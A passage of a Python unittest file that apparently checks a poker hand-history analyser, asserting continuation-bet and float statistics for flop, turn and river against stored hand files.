with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_cb(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb(), msg=file + ' ' + strt + ' ' + plr)
def test_cb_def_opp(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_cb_raise_def_opp(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(True, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(False, tmp.cb_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_enum_cb_def(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('call', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('fold', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_cb_raise_def(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in1gr2r__F__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual('3bet', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('fold', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Cb(hand, strt, plr)
self.assertEqual(None, tmp.enum_cb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
class TestFloat(unittest.TestCase):
def test_float_opp(self):
# folder containing the expected answer files
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
            hand = Reka(data.readlines())
        for strt, plr, expected in [('flop', 'sf', False), ('flop', 'zw', False),
                                    ('turn', 'sf', False), ('turn', 'zw', True)]:
            tmp = Float(hand, strt, plr)
            self.assertEqual(expected, tmp.float_opp(),
                             msg=file + ' ' + strt + ' ' + plr)
        # Expected float_opp() result for each (street, player) probe, per file.
        cases = [
            ('in1gr2r__F__BC__T__BRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr2r__F__BC__T__BF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in1gr3r__F__BCC__T__XXX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in1gr3r__F__BCC__T__XXBFC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in1gr3r__F__BCF__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', True)]),
            ('in1gr3r__F__BCF__T__XBC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', True)]),
            ('in2gr3r__F__BCF__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in2gr3r__F__BCF__T__XBRF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False)]),
            ('in2gr3r__F__XBCC__T__XXX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False), ('turn', 'kr', False)]),
            ('in2gr3r__F__XBCF__T__XX.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True)]),
            ('in2gr3r__F__XBCF__T__XBF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True)]),
            ('in2gr3r__F__XBCF__T__XBRC.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'zw', False), ('turn', 'kr', True)]),
            ('in2gr3r__F__XBFC__T__XX__R__BRF.txt',
             [('flop', 'sf', False), ('flop', 'zw', False), ('flop', 'kr', False),
              ('turn', 'sf', False), ('turn', 'zw', False),
              ('river', 'sf', True), ('river', 'zw', False)]),
